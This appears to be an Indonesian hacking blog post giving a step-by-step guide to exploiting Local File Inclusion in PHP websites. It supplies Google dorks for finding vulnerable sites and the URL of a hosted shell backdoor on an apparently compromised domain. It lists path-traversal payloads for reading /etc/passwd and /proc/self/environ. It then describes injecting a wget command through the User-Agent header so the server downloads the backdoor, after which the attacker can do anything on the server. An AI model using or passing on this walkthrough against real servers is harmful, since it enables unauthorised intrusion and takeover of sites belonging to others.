-
Hai Sobat.
Saya ikal
Disini, saya akan share sesuatu nih
-
Jadi, kalian pasti sudah tau lah mengenai bug local file inclusion atau lebih dikenal LFI, yaps bug yang memanfaatkan perintah include yang tidak difilter ini sangat berbahaya karena dapat mengakses file file yang ada didalam server secara tidak sah.
RFI dan LFI mirip mirip yah, namun berbeda sedikit.
Okeh langsung saja.
Bahan :
- Dork :
inurl:/index.php?page=about.php
inurl:?page=registration.php
inurl:?page=contact.php
- Shell Backdoor :
https://muslimdirectory.us/cmsuserfile/a.txt
1. Kalian cari error includean nya dulu.
Caranya, kalian cek url diwebsite dan jika urlnya seperti ini
https://localhost/index.php?page=file.php
Ubah file.php menjadi ../../ atau langsung panggil /etc/passwd
https://localhost/index.php?page=../../
https://localhost/index.php?page=/etc/passwd
Dan jika berhasil vuln, maka akan muncul seperti ini
Yaps, muncul
Warning: include(): open_basedir restriction in effect. File()
2. Memanggil file /etc/passwd
Jadi kita akan coba panggil /etc/passwd nya. Contoh :
https://localhost/index.php?page=/etc/passwd
Jika berhasil, akan muncul seperti ini :
Nah, nnti akan muncul seperti itu. Jika tidak muncul, coba naikan directorynya menjadi seperti ini :
https://localhost/index.php?page=../../etc/passwd
Jika masih tidak muncul, kalian naikan lagi sampai file /etc/passwd nya muncul.
3. Proses pemanggilan /proc/self/environ
Jika /etc/passwd sudah muncul, kalian lanjut panggil /proc/self/environ nya sesuai directory saat memanggil /etc/passwd.
Contoh :
https://localhost/index.php?page=/proc/self/environ
Jika /etc/passwd muncul di directory ../../../../ maka seperti ini :
https://localhost/index.php?page=../../../../proc/self/environ
Dan jika berhasil terpanggil, kalian bisa lanjut untuk melakukan proses upload shell backdoor.
4. Proses upload shell backdoor.
Jadi jika tahap 2 dan 3 sudah berhasil. Kalian bisa meng-upload shell backdoor dengan trik meracuni HTTP headernya dengan melakukan command wget di bagian user-agent. Jadi disini saya coba di android yang berarti saya akan meng-upload shell backdoor dengan bantuan androhackbar, dan jika di pc atau laptop kalian bisa gunakan addon Firefox atau anonhackbar pc yah.
Pertama kalian buka androhackbar dan tempel url site beserta /proc/self/environ nya. Lalu klik execute dan klik garis 3 di Pojok kanan atas dan klik Tamper Data dan aktifkan.
Lalu kalian execute dan edit user-agent nya menjadi command wget
Lalu klik submit dan shell backdoor pun akan terupload di document_root server. Akses shell nya dan kalian bebas melakukan apa saja terhadap server.
Mungkin segini aja. Ini hanya penjelasan dan cara melakukan nya saja. Tidak ada target di karenakan susah nyarinya
Thanks
See u
